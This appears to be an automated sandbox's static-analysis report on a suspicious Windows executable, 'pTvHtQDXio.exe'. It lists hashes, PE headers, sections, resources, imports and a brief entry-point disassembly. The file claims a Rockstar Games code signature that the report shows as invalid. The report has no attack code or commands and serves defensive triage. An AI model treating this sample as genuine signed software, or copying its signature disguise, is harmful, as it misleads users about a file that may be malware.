                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L....TT..........................................@..........................@............@.................................@E...................................E......8...............................@...............<............................text............................... ..`.rdata..PH.......J..................@..@.data....m...`...,...B..............@....rsrc................n..............@..@.reloc...E.......F...p..............@..Bhcj..........0......................@...................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.510572735424233
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:pTvHtQDXio.exe
                                                File size:14'014'536 bytes
                                                MD5:7c23cca92ddabc20911e0c51e19b002b
                                                SHA1:f0e07a68ca36681ece42c23d75351d51a9b52a8c
                                                SHA256:471f22db8436b846bcc1b8d9691adb74d02cee7b49e4a58772f486ece4ca19db
                                                SHA512:981afbb497ffde188e5134c181f85870ee1da5b9eb4dfda17e33f1b469a5bf76051071c1f37507c3a9bf1c2abe5c15379f1d2bb457d0953242aaba201fe5c3e1
                                                SSDEEP:196608:cbQLsmUzjxbODbedh49KRAg+89tvjXV9nHTDN0JgCDt0IEM:cbAUsWdlRT+wtrXzzwgCh0Ir
                                                TLSH:66E6E113B385613EE46F1E3A487BE624A93F7E217A12CD2B27F4198C4F35640693A747
                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                Icon Hash:de9edcdcdc9a9ed8
                                                Entrypoint:0x95a61c
                                                Entrypoint Section:.itext
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x6723E648 [Thu Oct 31 20:19:20 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:b6e2dc6fda6a433b890df57ef17fcdad
                                                Signature Valid:false
                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                Signature Validation Error:The digital signature of the object did not verify
                                                Error Number:-2146869232
                                                Not Before, Not After
                                                • 01/09/2023 02:00:00 01/09/2026 01:59:59
                                                Subject Chain
                                                • CN="Rockstar Games, Inc.", O="Rockstar Games, Inc.", L=New York, S=New York, C=US
                                                Version:3
                                                Thumbprint MD5:ACBF3E7CFB55E946C76DE628B6B4D1C8
                                                Thumbprint SHA-1:774CABFBE0A120481E7EC5A9150326129244DE13
                                                Thumbprint SHA-256:AFF85DE7E9C800198A38B63C5FC4EE09D6ED75A6587E5DE0882A9732B364577C
                                                Serial:043922E28E11D45F73AC1936CE97FC36
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                add esp, FFFFFFF0h
                                                mov eax, 009499A0h
                                                call 00007F99206439DDh
                                                push 0095A690h
                                                push 00000000h
                                                push 00000000h
                                                call 00007F992064C4C3h
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                call 00007F992089813Bh
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                mov dl, 01h
                                                call 00007F9920899EA1h
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                mov edx, 0095A6C4h
                                                call 00007F9920897B50h
                                                mov ecx, dword ptr [00983B98h]
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                mov edx, dword ptr [0093DB34h]
                                                call 00007F992089811Ch
                                                mov eax, dword ptr [00984788h]
                                                mov eax, dword ptr [eax]
                                                call 00007F992089826Ch
                                                call 00007F992063BF6Bh
                                                add byte ptr [eax], al
                                                push esi
                                                add byte ptr [edi+00h], cl
                                                push esi
                                                add byte ptr [ebx+00h], dl
                                                dec edi
                                                add byte ptr [esi+00h], al
                                                push esp
                                                add byte ptr [edi+00h], bl
                                                dec edi
                                                add byte ptr [ebx+00h], al
                                                push edx
                                                add byte ptr [edi+00h], bl
                                                push edx
                                                add byte ptr [ebp+00h], ah
                                                popad
                                                add byte ptr [eax+eax+65h], ah
                                                add byte ptr [edx+00h], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                mov al, 04h
                                                add al, byte ptr [eax]
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x5b5000 | 0x9b | .edata
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5b0000 | 0x3fb4 | .idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62c000 | 0x1fa217 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd5b020 | 0x2828 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5b8000 | 0x7357c |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x5b7000 | 0x18 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x5b0b40 | 0x9c4 | .idata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x5b4000 | 0xe0c | .didata
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x555f3c | 0x556000 | 64c70b9009ec5cce0ad5a1b5d77ac3d7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .itext | 0x557000 | 0x36dc | 0x3800 | 47fbf449b2b2bff640e8ef0433a89a77 | False | 0.5050223214285714 | data | 6.19341605851024 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .data | 0x55b000 | 0x2a124 | 0x2a200 | dc06c5340a642caa892f8777f0fed231 | False | 0.3076374721810089 | data | 6.093230118790674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .bss | 0x586000 | 0x2909c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata | 0x5b0000 | 0x3fb4 | 0x4000 | 43b0270b4d110befabad4bfb8ad09823 | False | 0.33038330078125 | data | 5.274523560388854 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .didata | 0x5b4000 | 0xe0c | 0x1000 | cbadc12bfca41b6c546ed38a9ab4bf5f | False | 0.303466796875 | data | 4.014333875326934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .edata | 0x5b5000 | 0x9b | 0x200 | 6320216ec133fefb1dabea8863b50092 | False | 0.2578125 | data | 1.8947667592796267 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .tls | 0x5b6000 | 0x78 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rdata | 0x5b7000 | 0x5d | 0x200 | eebedb4f5f94c0780b03eb36a0c3f1fa | False | 0.189453125 | data | 1.370020541144142 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc | 0x5b8000 | 0x73548 | 0x73600 | 416488c7609aaf3c310d1bb5b8eb5e46 | False | 0.5610526137594799 | data | 6.715780364534083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x62c000 | 0x1fa217 | 0x1fa400 | 2bb856072c65e5c3efe9e50da1ce7f65 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                YOV | 0x62d784 | 0x11cee7 | PNG image data, 2688 x 523, 8-bit/color RGB, non-interlaced | English | United States | 1.0000114440917969
                                                RT_CURSOR | 0x74a66c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
                                                RT_CURSOR | 0x74a7a0 | 0x134 | data | English | United States | 0.4642857142857143
                                                RT_CURSOR | 0x74a8d4 | 0x134 | data | English | United States | 0.4805194805194805
                                                RT_CURSOR | 0x74aa08 | 0x134 | data | English | United States | 0.38311688311688313
                                                RT_CURSOR | 0x74ab3c | 0x134 | data | English | United States | 0.36038961038961037
                                                RT_CURSOR | 0x74ac70 | 0x134 | data | English | United States | 0.4090909090909091
                                                RT_CURSOR | 0x74ada4 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
                                                RT_BITMAP | 0x74aed8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                RT_BITMAP | 0x74b0a8 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
                                                RT_BITMAP | 0x74b28c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                RT_BITMAP | 0x74b45c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
                                                RT_BITMAP | 0x74b62c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
                                                RT_BITMAP | 0x74b7fc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
                                                RT_BITMAP | 0x74b9cc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
                                                RT_BITMAP | 0x74bb9c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                RT_BITMAP | 0x74bd6c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
                                                RT_BITMAP | 0x74bf3c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                RT_BITMAP | 0x74c10c | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
                                                RT_BITMAP | 0x74c1f4 | 0x378 | Device independent bitmap graphic, 110 x 14 x 4, image size 784 | | | 0.23085585585585586
                                                RT_BITMAP | 0x74c56c | 0xd8 | Device independent bitmap graphic, 15 x 14 x 4, image size 112, resolution 2834 x 2834 px/m | | | 0.4675925925925926
                                                RT_ICON | 0x74c644 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.45161290322580644
                                                RT_ICON | 0x74c92c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5168918918918919
                                                RT_ICON | 0x74ca54 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.427771855010661
                                                RT_ICON | 0x74d8fc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.5546028880866426
                                                RT_ICON | 0x74e1a4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.6488439306358381
                                                RT_ICON | 0x74e70c | 0x1fbb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8703680906069187
                                                RT_ICON | 0x7506c8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.07546055739253661
                                                RT_ICON | 0x7548f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.1412863070539419
                                                RT_ICON | 0x756e98 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 | English | United States | 0.18831360946745562
                                                RT_ICON | 0x758900 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.1796435272045028
                                                RT_ICON | 0x7599a8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.3237704918032787
                                                RT_ICON | 0x75a330 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | English | United States | 0.3656976744186046
                                                RT_ICON0x75a9e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3696808510638298
                                                RT_DIALOG0x75ae500x52data0.7682926829268293
                                                RT_DIALOG0x75aea40x52data0.7560975609756098
                                                RT_STRING0x75aef80x298data0.44126506024096385
                                                RT_STRING0x75b1900x42cdata0.3202247191011236
                                                RT_STRING0x75b5bc0x400data0.392578125
                                                RT_STRING0x75b9bc0x4b8data0.4105960264900662
                                                RT_STRING0x75be740x1200data0.1853298611111111
                                                RT_STRING0x75d0740x8ecdata0.3397548161120841
                                                RT_STRING0x75d9600x974data0.3202479338842975
                                                RT_STRING0x75e2d40x91cdata0.26286449399656947
                                                RT_STRING0x75ebf00x63cdata0.33395989974937346
                                                RT_STRING0x75f22c0x1f0data0.4435483870967742
                                                RT_STRING0x75f41c0x5d4data0.3445040214477212
                                                RT_STRING0x75f9f00x39cdata0.4253246753246753
                                                RT_STRING0x75fd8c0x46cAmigaOS bitmap font "e", fc_YSize 18176, 20992 elements, 2nd "\034", 3rd "x"0.39664310954063603
                                                RT_STRING0x7601f80x320data0.42375
                                                RT_STRING0x7605180x4a0data0.3918918918918919
                                                RT_STRING0x7609b80x38cdata0.44162995594713655
                                                RT_STRING0x760d440x398data0.3423913043478261
                                                RT_STRING0x7610dc0x2acdata0.46345029239766083
                                                RT_STRING0x7613880x308data0.41494845360824745
                                                RT_STRING0x7616900x2ecdata0.42914438502673796
                                                RT_STRING0x76197c0x448data0.36496350364963503
                                                RT_STRING0x761dc40x8b4data0.3016157989228007
                                                RT_STRING0x7626780xae4data0.2309899569583931
                                                RT_STRING0x76315c0x4dcdata0.3729903536977492
                                                RT_STRING0x7636380x408data0.31589147286821706
                                                RT_STRING0x763a400x3c4data0.41804979253112035
                                                RT_STRING0x763e040x400data0.4140625
                                                RT_STRING0x7642040x48cdata0.39261168384879724
                                                RT_STRING0x7646900x1b0data0.5532407407407407
                                                RT_STRING0x7648400xccdata0.6666666666666666
                                                RT_STRING0x76490c0x17cdata0.5368421052631579
                                                RT_STRING0x764a880x254data0.4865771812080537
                                                RT_STRING0x764cdc0x390data0.38706140350877194
                                                RT_STRING0x76506c0x3c4data0.38070539419087135
                                                RT_STRING0x7654300x448data0.3613138686131387
                                                RT_STRING0x7658780x4c4data0.31721311475409836
                                                RT_STRING0x765d3c0x2c4data0.3559322033898305
                                                RT_STRING0x7660000x40cdata0.3996138996138996
                                                RT_STRING0x76640c0x4b8data0.3509933774834437
                                                RT_STRING0x7668c40x698data0.3033175355450237
                                                RT_STRING0x766f5c0x4a0data0.3293918918918919
                                                RT_STRING0x7673fc0x394data0.38318777292576417
                                                RT_STRING0x7677900x400data0.37890625
                                                RT_STRING0x767b900x350data0.3867924528301887
                                                RT_STRING0x767ee00xd4data0.5283018867924528
                                                RT_STRING0x767fb40xa4data0.6524390243902439
                                                RT_STRING0x7680580x2dcdata0.46311475409836067
                                                RT_STRING0x7683340x458data0.29856115107913667
                                                RT_STRING0x76878c0x31cdata0.42462311557788945
                                                RT_STRING0x768aa80x2e8data0.3736559139784946
                                                RT_STRING0x768d900x34cdata0.3068720379146919
                                                RT_RCDATA0x7690dc0x10data1.5
                                                RT_RCDATA0x7690ec0x1308data0.4755747126436782
                                                RT_RCDATA0x76a3f40x2dataEnglishUnited States5.0
                                                RT_RCDATA0x76a3f80x2355bDelphi compiled form 'TAboutBox'0.9526293606760128
                                                RT_RCDATA0x78d9540x2dbDelphi compiled form 'TAdForm'0.6238030095759234
                                                RT_RCDATA0x78dc300x1b0e3Delphi compiled form 'TAppForm'0.7625046246582264
                                                RT_RCDATA0x7a8d140x3831Delphi compiled form 'TFeedbackForm'0.47493917274939174
                                                RT_RCDATA0x7ac5480xac6Delphi compiled form 'TFormPDF'0.4126178390137781
                                                RT_RCDATA0x7ad0100x7caeDelphi compiled form 'TNagScreen'0.6467823798483614
                                                RT_RCDATA0x7b4cc00xcf8Delphi compiled form 'TNewVer'0.563855421686747
                                                RT_RCDATA0x7b59b80x6fd6cDelphi compiled form 'TTranslateForm'0.15776743536232896
                                                RT_GROUP_CURSOR0x8257240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                RT_GROUP_CURSOR0x8257380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                RT_GROUP_CURSOR0x82574c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x8257600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x8257740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x8257880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_CURSOR0x82579c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                RT_GROUP_ICON0x8257b00xbcdataEnglishUnited States0.6595744680851063
                                                RT_VERSION0x82586c0x2a0dataEnglishUnited States0.49851190476190477
                                                RT_MANIFEST0x825b0c0x70bXML 1.0 document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.403771491957848
DLL | Import
usp10.dll | ScriptGetProperties, ScriptItemize, ScriptShape, ScriptLayout, ScriptApplyDigitSubstitution
winmm.dll | sndPlaySoundW, timeGetTime
oleacc.dll | LresultFromObject
winspool.drv | DocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
comctl32.dll | ImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
shell32.dll | DragFinish, DragQueryPoint, DragQueryFileW, DragQueryFileA, DragAcceptFiles, Shell_NotifyIconW, ShellExecuteW
user32.dll | CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, SetCaretPos, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, DestroyCaret, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, GetAsyncKeyState, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, NotifyWinEvent, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, IsCharAlphaW, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateWindowExW, ChildWindowFromPoint, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, AnimateWindow, SetTimer, WindowFromPoint, BeginPaint, DrawStateW, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, CharLowerA, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, CreateCaret, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, GetDlgItem, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, SetKeyboardState, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CountClipboardFormats, CallWindowProcW, CloseClipboard, DestroyCursor, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, CharUpperA, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, CharNextA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, VerQueryValueA, GetFileVersionInfoW
oleaut32.dll | GetErrorInfo, SysFreeString, VariantClear, VariantInit, SysReAllocStringLen, SafeArrayCreate, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, VariantChangeType, VariantCopyInd
advapi32.dll | RegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, GetUserNameW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegFlushKey, RegQueryValueExW, RegEnumValueW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
msvcrt.dll | isupper, isalpha, isalnum, toupper, memchr, memcmp, memcpy, memset, isprint, isspace, iscntrl, isxdigit, ispunct, isgraph, islower, tolower
winhttp.dll | WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
kernel32.dll | SetFileAttributesW, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetSystemTime, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToTzSpecificLocalTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, CreateProcessW, HeapSize, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, GlobalFree, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, UnmapViewOfFile, GlobalHandle, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, EnumResourceNamesW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, CreatePipe, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, RemoveDirectoryW, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
SHFolder.dll | SHGetFolderPathW
ole32.dll | IsEqualGUID, OleInitialize, CreateStreamOnHGlobal, CLSIDFromProgID, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
gdi32.dll | Pie, EnumEnhMetaFile, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, CreateDCW, PolyBezierTo, CreateICW, GetStockObject, GetCharABCWidthsW, CreateSolidBrush, GetBkMode, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, SetTextCharacterExtra, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, SetMapMode, GetMapMode, CreateFontIndirectW, PolyBezier, ExtCreatePen, EndDoc, GetObjectW, GetFontData, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, CreateEnhMetaFileW, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, GetTextMetricsA, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, GetCharABCWidthsA, Rectangle, SaveDC, DeleteDC, BitBlt, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, 